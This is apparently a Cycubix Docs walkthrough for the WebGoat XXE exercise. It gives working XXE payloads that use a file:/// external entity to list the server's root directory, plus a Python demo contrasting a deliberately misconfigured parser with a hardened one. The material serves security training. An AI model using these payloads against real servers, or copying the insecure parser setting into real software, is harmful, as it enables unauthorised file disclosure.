A5:2021 | Security Misconfiguration (4) | Cycubix Docs
Let’s try
In this assignment, you will add a comment to the photo. When submitting the form, try to execute an XXE injection through the comment field, and use it to list the root directory of the filesystem.

Solution
Hints: Try submitting the form and see what happens. Use ZAP/Burp to intercept the request and try to include your own DTD. Try including a doctype (<!DOCTYPE ...>) in the XML. This exercise is all about understanding how XXE injection works.
The DOCTYPE can be as follows: <!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]>
Do not forget to reference the entity.
In the comment you should reference it like this: <comment><text>&root;test</text></comment>
For this exercise we can use Burp, ZAP or the browser's Developer Tools. First enable Intercept (Burp) or Break (ZAP). Then submit a comment on WebGoat and analyze the request.

Note the format in which the text "I am a cat" is sent and the path of the POST request.
In Burp Suite or ZAP, replace the text in the request body with the following to confirm that the server is vulnerable:
<?xml version="1.0"?><!DOCTYPE comment [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;</text></comment>
With Developer Tools you can do the following:
Open the Developer Tools in the browser and go to the Network tab.
On WebGoat, post a comment.
Locate the request to simple in the Network tab and click on Edit and Resend.
Edit the body with:
<?xml version="1.0"?><!DOCTYPE comment [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;</text></comment>
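What the server does with that body, shown as an added example that is not part of this page or of WebGoat: a Python script that builds the same payload, feeds it to a parser with external general entities switched on (the misconfiguration) and to one that rejects any DOCTYPE. WebGoat is a Java application, and Java's file: URL handler returns a directory listing for file:///; Python's urlopen does not, so the script points the entity at a constructed temporary file instead. The file content, the function names (build_xxe_payload, parse_comment_vulnerable, parse_comment_hardened, demo) and the SECRET value are the example's own.

```python
"""XXE demo: the WebGoat comment payload parsed by a misconfigured parser
and by a hardened one. Added example; the file, paths and names are made up."""
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.parsers import expat
from xml.sax import handler

# Constructed "sensitive" file content, standing in for what file:///etc/passwd
# or a directory listing would return on a real target.
SECRET = "root:x:0:0:root:/root:/bin/bash\n"


def build_xxe_payload(target_uri: str, entity: str = "xxe") -> bytes:
    """Same shape as the payload on this page: a DOCTYPE declaring an external
    SYSTEM entity, referenced inside <comment><text>."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE comment [<!ENTITY {entity} SYSTEM "{target_uri}">]>'
        f'<comment><text>&{entity};</text></comment>'
    ).encode()


class TextCollector(handler.ContentHandler):
    """Collects character data, i.e. what the app would store as the comment."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_comment_vulnerable(xml_bytes: bytes) -> str:
    """A stock xml.sax parser with external general entities enabled.
    Python turned this off by default in 3.7.1; switching it back on is the
    kind of parser misconfiguration this lesson is about."""
    parser = xml.sax.make_parser()
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.setFeature(handler.feature_external_ges, True)  # the misconfiguration
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


def parse_comment_hardened(xml_bytes: bytes) -> str:
    """Refuse any DOCTYPE, so no entity can be declared at all, and never
    install an ExternalEntityRefHandler, so SYSTEM entities are never fetched."""
    parser = expat.ParserCreate()
    chunks = []

    def reject_dtd(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE is not allowed in comment XML")

    parser.StartDoctypeDeclHandler = reject_dtd
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def demo() -> dict:
    """Write a throwaway secret file, point the payload at it, and parse it
    both ways. Returns what leaked and whether the hardened parser refused."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "secret.txt"
        secret.write_text(SECRET)
        payload = build_xxe_payload(secret.as_uri())  # file:///.../secret.txt
        leaked = parse_comment_vulnerable(payload)
        try:
            parse_comment_hardened(payload)
            blocked = False
        except ValueError:
            blocked = True
    return {"payload": payload.decode(), "leaked": leaked, "blocked": blocked}


if __name__ == "__main__":
    result = demo()
    print("payload:", result["payload"])
    print("vulnerable parser returned:", repr(result["leaked"]))
    print("hardened parser refused the DOCTYPE:", result["blocked"])
```

Run it with python3: the vulnerable parser hands back the file's contents as the comment text, which is exactly what WebGoat echoes into the comment list, while the hardened parser raises before the entity is even declared. The equivalent controls in a Java stack such as WebGoat are the Xerces feature http://apache.org/xml/features/disallow-doctype-decl and leaving external general entity resolution disabled.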

Details of the solution follow on the next page.